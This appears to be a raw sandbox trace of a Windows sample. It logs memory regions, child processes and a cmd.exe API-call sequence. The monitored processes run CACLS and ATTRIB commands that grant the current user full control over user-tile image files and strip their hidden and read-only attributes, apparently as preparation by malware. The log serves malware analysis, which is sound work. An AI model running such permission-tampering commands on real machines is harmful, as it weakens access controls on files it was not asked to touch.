Region: id = 26492 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26493 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26494 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26495 start_va = 0xb0000 end_va = 0x116fff entry_point = 0xb0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26496 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 26497 start_va = 0x2c0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 26498 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26499 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 26500 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26501 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 26502 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 
region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26503 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 26504 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 535 os_tid = 0xd30 Thread: id = 536 os_tid = 0xfc8 Process: id = "375" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16c20" os_pid = "0xd70" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "373" os_parent_pid = "0xf70" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26505 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26506 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26507 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26508 start_va = 0x1d0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = 
"private_0x00000000001d0000" filename = "" Region: id = 26509 start_va = 0x3e0000 end_va = 0x3e6fff entry_point = 0x3e0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 26510 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26511 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26512 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26513 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 26514 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26515 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26516 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26517 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26518 start_va = 0x5b0000 end_va = 0x6affff entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 26519 start_va = 0x880000 end_va = 0x88ffff entry_point = 0x0 region_type = private name = 
"private_0x0000000000880000" filename = "" Region: id = 26520 start_va = 0x6dea0000 end_va = 0x6debcfff entry_point = 0x6dea0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 26521 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26522 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 26523 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 26524 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26525 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 26526 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26527 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 26528 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" 
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 26529 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 26530 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 26531 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 26532 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 26533 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 26534 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 537 os_tid = 0xef0 Process: id = "376" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c40" os_pid = "0xe9c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" 
[0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26535 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26536 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26537 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26538 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 26539 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 26540 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26541 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26542 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26543 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 26544 start_va = 0x7ffdf000 end_va = 
0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26545 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26546 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26547 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26548 start_va = 0x140000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 26549 start_va = 0x390000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 26550 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 26551 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26552 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 26553 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26554 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = 
"\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26555 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 26556 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 26557 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 26558 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 26559 start_va = 0x270000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 26560 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 26561 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 26562 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 26563 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 26564 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 26565 
start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 26566 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 26567 start_va = 0x5a0000 end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 26568 start_va = 0x11a0000 end_va = 0x1302fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011a0000" filename = "" Region: id = 26569 start_va = 0x1310000 end_va = 0x15defff entry_point = 0x1310000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 538 os_tid = 0xe5c [0185.835] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26f87c | out: lpSystemTimeAsFileTime=0x26f87c*(dwLowDateTime=0xa3aa6960, dwHighDateTime=0x1d440a9)) [0185.835] GetCurrentProcessId () returned 0xe9c [0185.835] GetCurrentThreadId () returned 0xe5c [0185.835] GetTickCount () returned 0x351d6 [0185.835] QueryPerformanceCounter (in: lpPerformanceCount=0x26f874 | out: lpPerformanceCount=0x26f874*=24262435046) returned 1 [0185.836] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0185.836] __set_app_type (_Type=0x1) [0185.836] __p__fmode () returned 0x76b331f4 [0185.836] __p__commode () returned 0x76b331fc [0185.836] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0185.836] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0185.836] GetCurrentThreadId () returned 0xe5c [0185.836] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe5c) returned 0x38 [0185.836] GetModuleHandleW 
(lpModuleName="KERNEL32.DLL") returned 0x76910000 [0185.836] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0185.836] SetThreadUILanguage (LangId=0x0) returned 0x409 [0185.836] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0185.837] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26f80c | out: phkResult=0x26f80c*=0x0) returned 0x2 [0185.837] VirtualQuery (in: lpAddress=0x26f843, lpBuffer=0x26f7dc, dwLength=0x1c | out: lpBuffer=0x26f7dc*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0185.837] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26f7dc, dwLength=0x1c | out: lpBuffer=0x26f7dc*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0185.837] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26f7dc, dwLength=0x1c | out: lpBuffer=0x26f7dc*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0185.837] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26f7dc, dwLength=0x1c | out: lpBuffer=0x26f7dc*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0185.837] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26f7dc, dwLength=0x1c | out: lpBuffer=0x26f7dc*(BaseAddress=0x270000, AllocationBase=0x270000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0185.837] GetConsoleOutputCP () returned 0x1b5 [0185.837] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0185.837] SetConsoleCtrlHandler 
(HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0185.837] _get_osfhandle (_FileHandle=1) returned 0x7 [0185.837] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0185.837] _get_osfhandle (_FileHandle=1) returned 0x7 [0185.837] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0185.837] _get_osfhandle (_FileHandle=1) returned 0x7 [0185.837] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0185.838] _get_osfhandle (_FileHandle=0) returned 0x3 [0185.838] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0185.838] _get_osfhandle (_FileHandle=0) returned 0x3 [0185.838] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0185.838] GetEnvironmentStringsW () returned 0x3a0308* [0185.838] FreeEnvironmentStringsW (penv=0x3a0308) returned 1 [0185.838] GetEnvironmentStringsW () returned 0x3a0308* [0185.838] FreeEnvironmentStringsW (penv=0x3a0308) returned 1 [0185.838] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e77c | out: phkResult=0x26e77c*=0x40) returned 0x0 [0185.838] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e784, lpData=0x26e788, lpcbData=0x26e780*=0x1000 | out: lpType=0x26e784*=0x0, lpData=0x26e788*=0xb8, lpcbData=0x26e780*=0x1000) returned 0x2 [0185.838] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e784, lpData=0x26e788, lpcbData=0x26e780*=0x1000 | out: lpType=0x26e784*=0x4, lpData=0x26e788*=0x1, lpcbData=0x26e780*=0x4) returned 0x0 [0185.838] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e784, lpData=0x26e788, lpcbData=0x26e780*=0x1000 | out: lpType=0x26e784*=0x0, lpData=0x26e788*=0x1, lpcbData=0x26e780*=0x1000) returned 0x2 [0185.839] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, 
lpType=0x26e784, lpData=0x26e788, lpcbData=0x26e780*=0x1000 | out: lpType=0x26e784*=0x4, lpData=0x26e788*=0x0, lpcbData=0x26e780*=0x4) returned 0x0 [0185.839] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e784, lpData=0x26e788, lpcbData=0x26e780*=0x1000 | out: lpType=0x26e784*=0x4, lpData=0x26e788*=0x40, lpcbData=0x26e780*=0x4) returned 0x0 [0185.839] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e784, lpData=0x26e788, lpcbData=0x26e780*=0x1000 | out: lpType=0x26e784*=0x4, lpData=0x26e788*=0x40, lpcbData=0x26e780*=0x4) returned 0x0 [0185.839] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e784, lpData=0x26e788, lpcbData=0x26e780*=0x1000 | out: lpType=0x26e784*=0x0, lpData=0x26e788*=0x40, lpcbData=0x26e780*=0x1000) returned 0x2 [0185.839] RegCloseKey (hKey=0x40) returned 0x0 [0185.839] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e77c | out: phkResult=0x26e77c*=0x40) returned 0x0 [0185.839] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e784, lpData=0x26e788, lpcbData=0x26e780*=0x1000 | out: lpType=0x26e784*=0x0, lpData=0x26e788*=0x40, lpcbData=0x26e780*=0x1000) returned 0x2 [0185.839] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e784, lpData=0x26e788, lpcbData=0x26e780*=0x1000 | out: lpType=0x26e784*=0x4, lpData=0x26e788*=0x1, lpcbData=0x26e780*=0x4) returned 0x0 [0185.839] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e784, lpData=0x26e788, lpcbData=0x26e780*=0x1000 | out: lpType=0x26e784*=0x0, lpData=0x26e788*=0x1, lpcbData=0x26e780*=0x1000) returned 0x2 [0185.839] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e784, lpData=0x26e788, lpcbData=0x26e780*=0x1000 | out: 
lpType=0x26e784*=0x4, lpData=0x26e788*=0x0, lpcbData=0x26e780*=0x4) returned 0x0 [0185.839] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e784, lpData=0x26e788, lpcbData=0x26e780*=0x1000 | out: lpType=0x26e784*=0x4, lpData=0x26e788*=0x9, lpcbData=0x26e780*=0x4) returned 0x0 [0185.839] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e784, lpData=0x26e788, lpcbData=0x26e780*=0x1000 | out: lpType=0x26e784*=0x4, lpData=0x26e788*=0x9, lpcbData=0x26e780*=0x4) returned 0x0 [0185.839] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e784, lpData=0x26e788, lpcbData=0x26e780*=0x1000 | out: lpType=0x26e784*=0x0, lpData=0x26e788*=0x9, lpcbData=0x26e780*=0x1000) returned 0x2 [0185.839] RegCloseKey (hKey=0x40) returned 0x0 [0185.839] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886394 [0185.839] srand (_Seed=0x5b886394) [0185.839] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp\"" [0185.839] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp\"" [0185.840] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0185.840] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3a1a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0185.840] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0185.840] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0185.840] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0185.840] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0185.840] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0185.840] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0185.840] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0185.840] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0185.840] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0185.840] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0185.840] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0185.840] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0185.840] GetEnvironmentStringsW () returned 0x3a2458* [0185.840] FreeEnvironmentStringsW (penv=0x3a2458) returned 1 [0185.840] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0185.841] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0185.841] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0185.841] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0185.841] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0185.841] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0185.841] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0185.841] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0185.841] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 
